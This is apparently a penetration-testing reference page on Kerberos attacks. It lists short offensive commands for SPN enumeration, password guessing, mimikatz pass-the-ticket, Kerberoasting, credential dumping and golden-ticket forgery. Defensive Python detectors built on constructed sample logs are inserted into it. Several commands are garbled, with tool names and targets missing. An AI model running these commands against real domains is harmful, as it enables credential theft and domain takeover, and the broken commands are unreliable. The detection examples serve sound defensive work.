

Default Port: 88

Kerberos is a network authentication protocol that works on the basis of "tickets" to allow nodes to prove their identity over a non-secure network in a secure manner. Kerberos provides mutual authentication—both the user and the server verify each other's identity.


Identify Kerberos

To find all machines on a network that respond to Kerberos on TCP port 88:

nmap -p 88 --open --script=keberos -Pn -oA nmap/Kerberos



We can use from Impacket to request Service Principal Names (SPNs) which might reveal valuable information and valid usernames.

python -request -dc-ip DOMAIN/user

Attack Vectors

Password Guessing

Test for weak passwords associated with Kerberos-enabled users.

kerbrute password -d -t UsersPasswords.txt

Pass the Ticket

Once a valid Kerberos ticket has been obtained, a Pass the Ticket (PtT) attack can be performed with mimikatz.

mimikatz "kerberos::ptt ticket.kirbi"

Replace "ticket.kirbi" with your Kerberos ticket file.

mimikatz injects the ticket into the memory of the current logon session, so every subsequent request is authenticated to the Kerberos service using that ticket rather than a password.


Kerberoasting

User accounts with SPNs can be Kerberoasted: a service ticket for the SPN is requested, and because that ticket is encrypted with the service account's password hash, it can be cracked offline without further contact with the domain controller.

python -request -dc-ip DOMAIN/user
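Detection logic for the two Kerberos abuses described above (password guessing and Kerberoasting), as an added example that is not code from the original page or from Impacket or kerbrute. It assumes domain controller security events exported as dicts with the field names used below; the records themselves are constructed sample data. Password guessing against Kerberos shows up as a burst of Event ID 4771 (Kerberos pre-authentication failed, status 0x18 meaning wrong password) from one source address against many distinct accounts. Kerberoasting shows up as one account requesting service tickets (Event ID 4769) for many distinct SPNs, typically with the weak RC4-HMAC encryption type (0x17) so the ticket is cheaper to crack offline.

```python
"""Kerberos log detections: password spraying (4771 bursts) and
Kerberoasting (4769 RC4 service-ticket bursts). Added example; the event
records are constructed sample data, not real DC logs."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: abbreviated fields of DC security log entries.
SAMPLE_EVENTS = [
    # Six different accounts fail pre-authentication from one host in six seconds.
    {"time": "2024-01-10T09:00:01", "id": 4771, "user": "alice", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-01-10T09:00:02", "id": 4771, "user": "bob", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-01-10T09:00:03", "id": 4771, "user": "carol", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-01-10T09:00:04", "id": 4771, "user": "dave", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-01-10T09:00:05", "id": 4771, "user": "erin", "ip": "10.0.0.50", "status": "0x18"},
    {"time": "2024-01-10T09:00:06", "id": 4771, "user": "frank", "ip": "10.0.0.50", "status": "0x18"},
    # One user mistyping their own password twice: normal noise.
    {"time": "2024-01-10T09:02:00", "id": 4771, "user": "gina", "ip": "10.0.0.77", "status": "0x18"},
    {"time": "2024-01-10T09:02:30", "id": 4771, "user": "gina", "ip": "10.0.0.77", "status": "0x18"},
    # jdoe requests RC4 service tickets for three different service accounts.
    {"time": "2024-01-10T09:10:00", "id": 4769, "user": "jdoe", "ip": "10.0.0.61", "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-01-10T09:10:05", "id": 4769, "user": "jdoe", "ip": "10.0.0.61", "service": "svc_http", "etype": "0x17"},
    {"time": "2024-01-10T09:11:30", "id": 4769, "user": "jdoe", "ip": "10.0.0.61", "service": "svc_backup", "etype": "0x17"},
    # Machine-account SPNs and AES (0x12) tickets are routine and are not counted.
    {"time": "2024-01-10T09:11:40", "id": 4769, "user": "jdoe", "ip": "10.0.0.61", "service": "WS01$", "etype": "0x17"},
    {"time": "2024-01-10T09:12:00", "id": 4769, "user": "alice", "ip": "10.0.0.50", "service": "svc_http", "etype": "0x12"},
]


def find_bursts(events, group_by, distinct_field, window, threshold, keep):
    """Group matching events by `group_by`; report groups where at least
    `threshold` distinct values of `distinct_field` occur inside any `window`.
    Returns {group: highest distinct count seen in one window}."""
    per_group = defaultdict(list)
    for e in events:
        if keep(e):
            per_group[e[group_by]].append((datetime.fromisoformat(e["time"]), e[distinct_field]))
    flagged = {}
    for group, items in per_group.items():
        items.sort()
        best, start = 0, 0
        for end in range(len(items)):  # sliding window over sorted timestamps
            while items[end][0] - items[start][0] > window:
                start += 1
            best = max(best, len({v for _, v in items[start:end + 1]}))
        if best >= threshold:
            flagged[group] = best
    return flagged


def detect_password_spraying(events, window=timedelta(seconds=60), threshold=5):
    """Source IPs that failed pre-auth with a wrong password for >= threshold accounts."""
    return find_bursts(events, "ip", "user", window, threshold,
                       lambda e: e["id"] == 4771 and e["status"] == "0x18")


def detect_kerberoasting(events, window=timedelta(minutes=5), threshold=3):
    """Accounts that pulled RC4 service tickets for >= threshold distinct non-machine SPNs."""
    return find_bursts(events, "user", "service", window, threshold,
                       lambda e: e["id"] == 4769 and e.get("etype") == "0x17"
                       and not e["service"].endswith("$"))


if __name__ == "__main__":
    print("spraying:", detect_password_spraying(SAMPLE_EVENTS))    # {'10.0.0.50': 6}
    print("kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))   # {'jdoe': 3}
```

The thresholds and windows are starting points, not tuned values: a single user fumbling a password never reaches five distinct accounts from one address, and legitimate clients rarely request RC4 tickets for several service accounts within minutes once AES is enforced for service accounts. The most robust mitigation for Kerberoasting is long random passwords on SPN-bearing accounts (or group Managed Service Accounts), which make the offline cracking step infeasible regardless of detection.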


Secrets Dumping

Once the system is compromised, all credential material on it (Kerberos tickets, password hashes, and so on) can be dumped to extend the attack.

Using from Impacket:

python -just-dc domain/Administrator:Password@

Replace "domain/Administrator:Password" with a valid domain user and password.

Golden Ticket Attack

A golden ticket is a forged TGT signed with the krbtgt account's hash; holding one allows virtually unrestricted access to the whole domain. It is created with the following mimikatz command:

mimikatz "kerberos::golden /user:Administrator / /sid:S-1-5-21-XXXX /krbtgt:eeb9046b77d48962314e376f1925065a /id:500"
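Detection of a forged TGT, as an added example that is not code from the original page or from mimikatz. The idea: a golden ticket is minted offline with the krbtgt hash, so the domain controllers never logged a TGT request (Event ID 4768) for it, yet the account then presents it in service-ticket requests (Event ID 4769). The check below flags every 4769 whose account has no successful 4768 on record within the maximum TGT lifetime (10 hours under the default domain policy) before the request. It assumes events from all domain controllers are merged into one stream; the records below are constructed sample data.

```python
"""Golden-ticket detection: service-ticket requests (4769) with no TGT ever
issued (4768) for that account inside the TGT lifetime. Added example;
the event records are constructed sample data, not real DC logs."""
from collections import defaultdict
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)  # default "Maximum lifetime for user ticket"

# Constructed sample events (abbreviated DC security log fields).
TICKET_EVENTS = [
    # alice: TGT issued at 08:00, service ticket at 09:00 -> consistent.
    {"time": "2024-01-10T08:00:00", "id": 4768, "user": "alice", "ip": "10.0.0.50", "status": "0x0"},
    {"time": "2024-01-10T09:00:00", "id": 4769, "user": "alice", "ip": "10.0.0.50", "service": "svc_http"},
    # bob: last TGT issued 13.5 hours earlier, longer than any valid TGT could live.
    {"time": "2024-01-09T20:00:00", "id": 4768, "user": "bob", "ip": "10.0.0.20", "status": "0x0"},
    {"time": "2024-01-10T09:30:00", "id": 4769, "user": "bob", "ip": "10.0.0.20", "service": "cifs/FS01"},
    # Administrator: service ticket requested with no TGT issued at all.
    {"time": "2024-01-10T09:45:00", "id": 4769, "user": "Administrator", "ip": "10.0.0.99", "service": "cifs/DC01"},
]


def find_tgs_without_tgt(events, lifetime=MAX_TGT_LIFETIME):
    """Return [(user, ip)] for 4769 requests with no successful 4768 for that
    account in the `lifetime` window preceding them, in time order."""
    issued = defaultdict(list)
    for e in events:
        if e["id"] == 4768 and e["status"] == "0x0":  # 0x0 = TGT actually issued
            issued[e["user"]].append(datetime.fromisoformat(e["time"]))
    suspicious = []
    for e in sorted(events, key=lambda ev: ev["time"]):  # ISO timestamps sort lexically
        if e["id"] != 4769:
            continue
        t = datetime.fromisoformat(e["time"])
        if not any(t - lifetime <= when <= t for when in issued[e["user"]]):
            suspicious.append((e["user"], e["ip"]))
    return suspicious


if __name__ == "__main__":
    for user, ip in find_tgs_without_tgt(TICKET_EVENTS):
        print(f"service ticket without a recorded TGT: {user} from {ip}")
```

Expect false positives from TGT renewals and from gaps in log collection (a TGT issued by a DC whose events are missing looks exactly like a forged one), so treat hits as leads to correlate with the client host rather than as verdicts. Detection is secondary to containment here: once the krbtgt hash is known to be exposed, the krbtgt password must be reset twice (with replication in between) so that tickets signed with the old hash stop validating.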